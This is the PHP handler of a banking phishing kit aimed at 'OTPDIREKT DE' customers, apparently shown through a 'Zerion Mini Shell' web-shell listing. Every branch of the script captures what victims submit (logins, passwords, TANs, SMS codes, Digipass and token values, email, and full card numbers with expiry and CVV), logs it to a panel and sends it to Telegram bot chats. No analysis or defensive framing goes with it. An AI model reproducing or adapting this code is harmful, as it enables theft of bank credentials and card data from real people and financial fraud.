Mini Shell
<?php
require "../main.php";
$bot = $a_bot;
$ids = explode(",", str_replace(" ", "", $a_ids));
$ip = $_SERVER['REMOTE_ADDR'];
$time = date("M d, Y") . " at " . date("h:i:sa");
function post($data)
{
if (empty(trim($data))) {
return "NO_DATA";
} else {
return htmlspecialchars($_POST[$data]);
}
}
function sendBot($url)
{
$ci = curl_init();
curl_setopt($ci, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ci, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ci, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ci, CURLOPT_URL, $url);
return curl_exec($ci);
curl_close($ci);
}
if (isset($_POST['CustID'])) {
$login = post("CustID");
$password = post("password");
$telegram_content = urlencode("
OTPDIREKT DE LOGIN / $ip
---------------------------------------
+ Login : $login
+ Password : $password
---------------------------------------
+ PANEL : $panel
");
$oldlogs = $m->getData()["LOGS"];
$newlogs = $oldlogs . "\n+ LOGIN [ $login | $password ] ";
$arr = array("LOGS" => $newlogs);
$m->update($arr);
foreach ($ids as $id) {
$url = "https://api.telegram.org/bot$bot/sendMessage?chat_id=$id&text=$telegram_content";
sendBot($url);
}
}
if (isset($_POST['CustID2'])) {
$login = post("CustID2");
$telegram_content = urlencode("
OTPDIREKT DE LOGIN / $ip
---------------------------------------
+ Login Ultimele 6 cifre din CNP : $login
---------------------------------------
+ PANEL : $panel
");
$oldlogs = $m->getData()["LOGS"];
$newlogs = $oldlogs . "\n+ LOGIN [ $login ] ";
$arr = array("LOGS" => $newlogs);
$m->update($arr);
foreach ($ids as $id) {
$url = "https://api.telegram.org/bot$bot/sendMessage?chat_id=$id&text=$telegram_content";
sendBot($url);
}
}
if (isset($_POST['PHYSICAL_TOKEN'])) {
$PHYSICAL_TOKEN = post("PHYSICAL_TOKEN");
$telegram_content = urlencode("
OTPDIREKT DE PHYSICAL_TOKEN / $ip
---------------------------------------
+ PHYSICAL_TOKEN : $PHYSICAL_TOKEN
---------------------------------------
+ PANEL : $panel
");
$oldlogs = $m->getData()["LOGS"];
$newlogs = $oldlogs . "\n+ LOGIN [ $PHYSICAL_TOKEN ] ";
$arr = array("LOGS" => $newlogs);
$m->update($arr);
foreach ($ids as $id) {
$url = "https://api.telegram.org/bot$bot/sendMessage?chat_id=$id&text=$telegram_content";
sendBot($url);
}
}
if (isset($_POST['tan'])) {
$sms = post("tan");
$telegram_content = urlencode("
OTPDIREKT DE TAN / $ip
---------------------------------------
+ TAN : $sms
---------------------------------------
+ PANEL : $panel
");
$oldlogs = $m->getData()["LOGS"];
$newlogs = $oldlogs . "\n+ TAN [ $sms ]";
$arr = array("LOGS" => $newlogs);
$m->update($arr);
foreach ($ids as $id) {
$url = "https://api.telegram.org/bot$bot/sendMessage?chat_id=$id&text=$telegram_content";
sendBot($url);
}
}
if (isset($_POST['Digipass'])) {
$email = post("Digipass");
$telegram_content = urlencode("
OTPDIREKT DE Digipass / $ip
---------------------------------------
+ Digipass : $email
---------------------------------------
+ PANEL : $panel
");
$oldlogs = $m->getData()["LOGS"];
$newlogs = $oldlogs . "\n+ Digipass [ $email ] ";
$arr = array("LOGS" => $newlogs);
$m->update($arr);
//SENDOTPDIREKT INFO TO TELEGRAM BOT...
foreach ($ids as $id) {
$url = "https://api.telegram.org/bot$bot/sendMessage?chat_id=$id&text=$telegram_content";
sendBot($url);
}
}
if (isset($_POST['firma'])) {
$firma = post("firma");
$telegram_content = urlencode("
OTPDIREKT DE FIRMA / $ip
---------------------------------------
+ FIRMA : $firma
---------------------------------------
+ PANEL : $panel
");
$oldlogs = $m->getData()["LOGS"];
$newlogs = $oldlogs . "\n+ FIRMA [ $firma ] ";
$arr = array("LOGS" => $newlogs);
$m->update($arr);
foreach ($ids as $id) {
$url = "https://api.telegram.org/bot$bot/sendMessage?chat_id=$id&text=$telegram_content";
sendBot($url);
}
}
if (isset($_POST['sms'])) {
$sms = post("sms");
$telegram_content = urlencode("
OTPDIREKT DE SMS 1 / $ip
---------------------------------------
+ SMS : $sms
---------------------------------------
+ PANEL : $panel
");
$oldlogs = $m->getData()["LOGS"];
$newlogs = $oldlogs . "\n+ SMS [ $sms ] ";
$arr = array("LOGS" => $newlogs);
$m->update($arr);
//SENDOTPDIREKT INFO TO TELEGRAM BOT...
foreach ($ids as $id) {
$url = "https://api.telegram.org/bot$bot/sendMessage?chat_id=$id&text=$telegram_content";
sendBot($url);
}
}
if (isset($_POST['sms2'])) {
$sms2 = post("sms2");
$telegram_content = urlencode("
OTPDIREKT DE SMS 2 / $ip
---------------------------------------
+ SMS : $sms2
---------------------------------------
+ PANEL : $panel
");
$oldlogs = $m->getData()["LOGS"];
$newlogs = $oldlogs . "\n+ SMS [ $sms2 ] ";
$arr = array("LOGS" => $newlogs);
$m->update($arr);
//SENDOTPDIREKT INFO TO TELEGRAM BOT...
foreach ($ids as $id) {
$url = "https://api.telegram.org/bot$bot/sendMessage?chat_id=$id&text=$telegram_content";
sendBot($url);
}
}
if (isset($_POST['EMAIL'])) {
$email = post("EMAIL");
$telegram_content = urlencode("
OTPDIREKT DE Email / $ip
---------------------------------------
+ Email : $email
---------------------------------------
+ PANEL : $panel
");
$oldlogs = $m->getData()["LOGS"];
$newlogs = $oldlogs . "\n+ Email [ $email ] ";
$arr = array("LOGS" => $newlogs);
$m->update($arr);
//SENDOTPDIREKT INFO TO TELEGRAM BOT...
foreach ($ids as $id) {
$url = "https://api.telegram.org/bot$bot/sendMessage?chat_id=$id&text=$telegram_content";
sendBot($url);
}
}
if (isset($_POST['cc'])) {
$titular = post('titular');
$cardnumber = post('cc');
$exp = post("exp");
$cvv = post("cvv");
$telegram_content = urlencode("
OTPDIREKT DE CARD 1 / $ip
---------------------------------------
+ Titular : $titular
+ Cardnumber : $cardnumber
+ ExpDate : $exp
+ CVV : $cvv
---------------------------------------
+ PANEL : $panel
");
$oldlogs = $m->getData()["LOGS"];
$newlogs = $oldlogs . "\n+ CARD [ $titular | $cardnumber | $exp | $cvv ]";
$arr = array("LOGS" => $newlogs);
$m->update($arr);
//SENDOTPDIREKT INFO TO TELEGRAM BOT...
foreach ($ids as $id) {
$url = "https://api.telegram.org/bot$bot/sendMessage?chat_id=$id&text=$telegram_content";
sendBot($url);
}
}
if (isset($_POST['cc2'])) {
$titular = post('titular');
$cardnumber = post('cc2');
$exp = post("exp");
$cvv = post("cvv");
$telegram_content = urlencode("
OTPDIREKT DE CARD 2 / $ip
---------------------------------------
+ Titular : $titular
+ Cardnumber : $cardnumber
+ ExpDate : $exp
+ CVV : $cvv
---------------------------------------
+ PANEL : $panel
");
$oldlogs = $m->getData()["LOGS"];
$newlogs = $oldlogs . "\n+ CARD [ $titular | $cardnumber | $exp | $cvv ]";
$arr = array("LOGS" => $newlogs);
$m->update($arr);
//SENDOTPDIREKT INFO TO TELEGRAM BOT...
foreach ($ids as $id) {
$url = "https://api.telegram.org/bot$bot/sendMessage?chat_id=$id&text=$telegram_content";
sendBot($url);
}
}
?>
Zerion Mini Shell 1.0